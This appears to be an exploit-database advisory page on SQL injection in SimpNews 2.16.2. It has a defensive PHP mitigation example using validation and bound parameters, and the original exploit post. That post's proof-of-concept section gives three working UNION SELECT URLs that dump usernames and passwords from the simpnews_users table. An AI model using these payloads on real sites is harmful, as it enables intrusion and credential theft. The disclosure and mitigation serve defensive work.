Vendor: SimpNews
By: NoGe
CVSS: 7.5 (HIGH)
Type: SQL Injection
CWE: 89
Product Name: SimpNews
Affected Version From: 2.16.2
Affected Version To: 2.16.2
Patch Exists: NO
Related CWE: N/A
CPE: a:boesch-it:simpnews
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

SimpNews Multiple SQL Injection Vulnerabilities

SimpNews version 2.16.2 and below is affected by multiple SQL injection vulnerabilities. The vulnerable files are news.php, master.php and announceprint.php. An attacker can exploit them by sending SQL through the request parameters these files accept: news.php?category=[sql], master.php?newsnr=[sql] and announceprint.php?announcenr=[sql].

Mitigation:

Developers should ensure that user-supplied input is properly sanitized and validated before being used in SQL queries.
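
One way to apply this mitigation to the three parameters named above, as an added example that is not SimpNews code: it assumes category, newsnr and announcenr are numeric identifiers, and it runs against a constructed demo_news table in an in-memory SQLite database through PDO. The helper names requireId and newsByCategory are hypothetical.

```php
<?php
declare(strict_types=1);

// Constructed stand-in schema; the real SimpNews tables are not shown on the page.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE demo_news (newsnr INTEGER PRIMARY KEY, category INTEGER, headline TEXT)');
$pdo->exec("INSERT INTO demo_news VALUES (1, 2, 'Release notes'), (2, 2, 'Maintenance'), (3, 5, 'Other')");

// Hypothetical helper: return the parameter as a positive int, or throw.
// Assumes category, newsnr and announcenr are numeric identifiers.
function requireId(array $query, string $name): int
{
    $raw = $query[$name] ?? null;
    if (!is_string($raw)) {            // missing, or array-style ?category[]=2
        throw new InvalidArgumentException("$name is required");
    }
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {               // anything that is not wholly an integer
        throw new InvalidArgumentException("$name must be a positive integer");
    }
    return $id;
}

// Hypothetical handler: validate first, then bind; the value is never
// concatenated into the SQL text.
function newsByCategory(PDO $pdo, array $query): array
{
    $stmt = $pdo->prepare(
        'SELECT newsnr, headline FROM demo_news WHERE category = :category ORDER BY newsnr'
    );
    $stmt->bindValue(':category', requireId($query, 'category'), PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed inputs standing in for $_GET.
$samples = [['category' => '2'], ['category' => '2 AND 1=2'], ['category' => ['2']], []];
foreach ($samples as $query) {
    try {
        $result = count(newsByCategory($pdo, $query)) . ' row(s)';
    } catch (InvalidArgumentException $e) {
        $result = 'rejected: ' . $e->getMessage();   // a real handler would answer HTTP 400
    }
    printf("%-28s %s\n", json_encode($query), $result);
}
```

The same requireId call applies unchanged to newsnr in master.php and announcenr in announceprint.php; the bound parameter keeps the query safe even if the validation is later relaxed.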

Exploit-DB raw data:

==============================================================================================================


  [o] SimpNews Multiple SQL Injection Vulnerabilities

       Software : SimpNews version 2.16.2 and below
       Vendor   : http://www.boesch-it.de/
       Author   : NoGe
       Contact  : noge[dot]code[at]gmail[dot]com
       Blog     : http://evilc0de.blogspot.com/
       Home     : http://antisecurity.org/


==============================================================================================================


  [o] Vulnerable file

       news.php
       master.php
       announceprint.php


  [o] Exploit

       http://localhost/[path]/news.php?category=[sql]
       http://localhost/[path]/master.php?newsnr=[sql]
       http://localhost/[path]/announceprint.php?announcenr=[sql]


  [o] PoC

       http://localhost/news.php?category=2+AND+1=2+UNION+ALL+SELECT+1,GROUP_CONCAT(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+FROM+simpnews_users--
       http://localhost/master.php?newsnr=-999+UNION+SELECT+0,0,0,password,username,username,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM+simpnews_users+WHERE+usernr=1--
       http://localhost/announceprint.php?announcenr=1+AND+1=2+UNION+ALL+SELECT+1,2,3,4,GROUP_CONCAT(username,0x3a,password),6,7,8,9,10,11,12,13,14,15+FROM+simpnews_users--


==============================================================================================================


  [o] Greetz

       Vrs-hCk OoN_BoY Paman zxvf Angela Zhang aJe martfella
       H312Y yooogy mousekill }^-^{ noname matthews s4va stardustmemory :*
       skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke

==============================================================================================================